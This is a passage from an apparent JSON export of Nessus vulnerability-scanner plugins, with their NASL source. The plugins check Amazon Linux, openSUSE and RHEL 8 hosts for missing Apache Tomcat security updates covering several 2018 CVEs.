origins. 
It is\nexpected that users of the CORS filter will have configured it\nappropriately for their environment rather than using it in the\ndefault configuration. Therefore, it is expected that most users will\nnot be impacted by this issue.(CVE-2018-8014)\n\nAn improper handing of overflow in the UTF-8 decoder with\nsupplementary characters can lead to an infinite loop in the decoder\ncausing a Denial of Service. Versions Affected: Apache Tomcat 8.5.0 to\n8.5.30. (CVE-2018-1336)\n\nThe host name verification when using TLS with the WebSocket client\nwas missing. It is now enabled by default. Versions Affected: Apache\nTomcat 8.5.0 to 8.5.31.(CVE-2018-8034)\n\nA bug in the tracking of connection closures can lead to reuse of user\nsessions in a new connection. Versions Affected: Apache Tomcat 8.5.5\nto 8.5.31.(CVE-2018-8037)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-1056.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update tomcat8' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-el-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-admin-webapps-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-docs-webapp-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-el-3.0-api-8.5.32-1.78.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"tomcat8-javadoc-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-jsp-2.3-api-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-lib-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-log4j-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-servlet-3.1-api-8.5.32-1.78.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tomcat8-webapps-8.5.32-1.78.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat8 / tomcat8-admin-webapps / tomcat8-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:09:23", "description": "This update for tomcat to version 9.0.10 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-1336: An improper handing of overflow in the UTF-8 decoder with supplementary characters could have lead to an infinite loop in the decoder causing a Denial of Service (bsc#1102400).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings (bsc#1093697).\n\n - CVE-2018-8034: The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the application at the same time as the container triggered the async timeout, a race condition existed that could have resulted in a user seeing a response intended for a different user. An additional issue was present in the NIO and NIO2 connectors that did not correctly track the closure of the connection when an async request was completed by the application and timed out by the container at the same time. 
This could also have resulted in a user seeing a response intended for another user (bsc#1102410).\n\nBug fixes :\n\n - Avoid overwriting of customer's configuration during update (bsc#1067720)\n\n - Disable adding OSGi metadata to JAR files\n\n - See changelog at http://tomcat.apache.org/tomcat-9.0-doc/changelog.html#T omcat_9.0.10_(markt)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : tomcat (openSUSE-2019-770)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-1336", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:tomcat-lib", "p-cpe:/a:novell:opensuse:tomcat-servlet-4_0-api", "p-cpe:/a:novell:opensuse:tomcat-webapps", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:tomcat", "p-cpe:/a:novell:opensuse:tomcat-admin-webapps", "p-cpe:/a:novell:opensuse:tomcat-docs-webapp", "p-cpe:/a:novell:opensuse:tomcat-el-3_0-api", "p-cpe:/a:novell:opensuse:tomcat-embed", "p-cpe:/a:novell:opensuse:tomcat-javadoc", "p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api", "p-cpe:/a:novell:opensuse:tomcat-jsvc"], "id": "OPENSUSE-2019-770.NASL", "href": "https://www.tenable.com/plugins/nessus/123330", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-770.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123330);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-1336\", \"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n\n script_name(english:\"openSUSE Security Update : tomcat (openSUSE-2019-770)\");\n 
script_summary(english:\"Check for the openSUSE-2019-770 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for tomcat to version 9.0.10 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-1336: An improper handing of overflow in the\n UTF-8 decoder with supplementary characters could have\n lead to an infinite loop in the decoder causing a Denial\n of Service (bsc#1102400).\n\n - CVE-2018-8014: Fix insecure default CORS filter settings\n (bsc#1093697).\n\n - CVE-2018-8034: The host name verification when using TLS\n with the WebSocket client was missing. It is now enabled\n by default (bsc#1102379).\n\n - CVE-2018-8037: If an async request was completed by the\n application at the same time as the container triggered\n the async timeout, a race condition existed that could\n have resulted in a user seeing a response intended for a\n different user. An additional issue was present in the\n NIO and NIO2 connectors that did not correctly track the\n closure of the connection when an async request was\n completed by the application and timed out by the\n container at the same time. 
This could also have\n resulted in a user seeing a response intended for\n another user (bsc#1102410).\n\nBug fixes :\n\n - Avoid overwriting of customer's configuration during\n update (bsc#1067720)\n\n - Disable adding OSGi metadata to JAR files\n\n - See changelog at\n http://tomcat.apache.org/tomcat-9.0-doc/changelog.html#T\n omcat_9.0.10_(markt)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n # http://tomcat.apache.org/tomcat-9.0-doc/changelog.html#Tomcat_9.0.10_(markt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8887ec3f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1067720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1093697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102379\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102400\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1102410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-el-3_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-servlet-4_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-admin-webapps-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-docs-webapp-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-el-3_0-api-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-embed-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-javadoc-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-jsp-2_3-api-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-jsvc-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-lib-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-servlet-4_0-api-9.0.10-lp150.2.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-webapps-9.0.10-lp150.2.3.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:24:20", "description": "An update for the pki-deps:10.6 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe Public Key Infrastructure (PKI) Deps module contains fundamental packages required as dependencies for the pki-core module by Red Hat Certificate System.\n\nSecurity Fix(es) :\n\n* tomcat: Due to a mishandling of close in NIO/NIO2 connectors user sessions can get mixed up (CVE-2018-8037)\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Open redirect in default servlet (CVE-2018-11784)\n\n* tomcat: Host name verification missing in WebSocket client (CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {}, "published": "2019-06-19T00:00:00", "type": "nessus", "title": "RHEL 8 : pki-deps:10.6 (RHSA-2019:1529)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11784", "CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2022-02-01T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:apache-commons-collections", "p-cpe:/a:redhat:enterprise_linux:apache-commons-lang", "p-cpe:/a:redhat:enterprise_linux:bea-stax-api", "p-cpe:/a:redhat:enterprise_linux:glassfish-fastinfoset", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-api", 
"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-core", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-runtime", "p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-txw2", "p-cpe:/a:redhat:enterprise_linux:jackson-annotations", "p-cpe:/a:redhat:enterprise_linux:pki-servlet-container", "p-cpe:/a:redhat:enterprise_linux:python-nss-debugsource", "p-cpe:/a:redhat:enterprise_linux:python-nss-doc", "p-cpe:/a:redhat:enterprise_linux:jackson-core", "p-cpe:/a:redhat:enterprise_linux:python3-nss", "p-cpe:/a:redhat:enterprise_linux:jackson-databind", "p-cpe:/a:redhat:enterprise_linux:relaxngdatatype", "p-cpe:/a:redhat:enterprise_linux:jackson-jaxrs-json-provider", "p-cpe:/a:redhat:enterprise_linux:resteasy", "p-cpe:/a:redhat:enterprise_linux:slf4j", "p-cpe:/a:redhat:enterprise_linux:jackson-jaxrs-providers", "p-cpe:/a:redhat:enterprise_linux:slf4j-jdk14", "p-cpe:/a:redhat:enterprise_linux:jackson-module-jaxb-annotations", "p-cpe:/a:redhat:enterprise_linux:stax-ex", "p-cpe:/a:redhat:enterprise_linux:velocity", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-httpclient", "p-cpe:/a:redhat:enterprise_linux:xalan-j2", "p-cpe:/a:redhat:enterprise_linux:xerces-j2", "p-cpe:/a:redhat:enterprise_linux:xml-commons-apis", "p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver", "p-cpe:/a:redhat:enterprise_linux:javassist", "p-cpe:/a:redhat:enterprise_linux:xmlstreambuffer", "p-cpe:/a:redhat:enterprise_linux:xsom", "p-cpe:/a:redhat:enterprise_linux:javassist-javadoc", "cpe:/o:redhat:enterprise_linux:8", "cpe:/o:redhat:enterprise_linux:8.0", "p-cpe:/a:redhat:enterprise_linux:pki-servlet-4.0-api"], "id": "REDHAT-RHSA-2019-1529.NASL", "href": "https://www.tenable.com/plugins/nessus/126030", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:1529. 
The text\n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(126030);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/01\");\n\n script_cve_id(\n \"CVE-2018-8014\",\n \"CVE-2018-8034\",\n \"CVE-2018-8037\",\n \"CVE-2018-11784\"\n );\n script_xref(name:\"RHSA\", value:\"2019:1529\");\n\n script_name(english:\"RHEL 8 : pki-deps:10.6 (RHSA-2019:1529)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for the pki-deps:10.6 module is now available for Red Hat\nEnterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe Public Key Infrastructure (PKI) Deps module contains fundamental\npackages required as dependencies for the pki-core module by Red Hat\nCertificate System.\n\nSecurity Fix(es) :\n\n* tomcat: Due to a mishandling of close in NIO/NIO2 connectors user\nsessions can get mixed up (CVE-2018-8037)\n\n* tomcat: Insecure defaults in CORS filter enable\n'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat: Open redirect in default servlet (CVE-2018-11784)\n\n* tomcat: Host name verification missing in WebSocket client\n(CVE-2018-8034)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:1529\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-8014\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-8034\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-8037\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-11784\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-commons-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bea-stax-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-fastinfoset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-core\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glassfish-jaxb-txw2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jackson-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jackson-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jackson-databind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jackson-jaxrs-json-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jackson-jaxrs-providers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jackson-module-jaxb-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-httpclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pki-servlet-4.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pki-servlet-container\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-nss-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-nss-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:relaxngDatatype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:slf4j\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:slf4j-jdk14\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:stax-ex\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:velocity\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xalan-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xmlstreambuffer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xsom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 8.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nmodule_ver = get_kb_item('Host/RedHat/appstream/pki-deps');\nif (isnull(module_ver)) audit(AUDIT_PACKAGE_NOT_INSTALLED, 'Module pki-deps:10.6');\nif ('10.6' >!< module_ver) audit(AUDIT_PACKAGE_NOT_AFFECTED, 'Module pki-deps:' + module_ver);\n\nappstreams = {\n 'pki-deps:10.6': [\n {'reference':'apache-commons-collections-3.2.2-10.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'apache-commons-lang-2.6-21.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'bea-stax-api-1.2.0-16.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'glassfish-fastinfoset-1.2.13-9.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'glassfish-jaxb-api-2.2.12-8.module+el8.0.0+3248+9d514f3b', 'release':'8'},\n {'reference':'glassfish-jaxb-core-2.2.11-11.module+el8.0.0+3248+9d514f3b', 
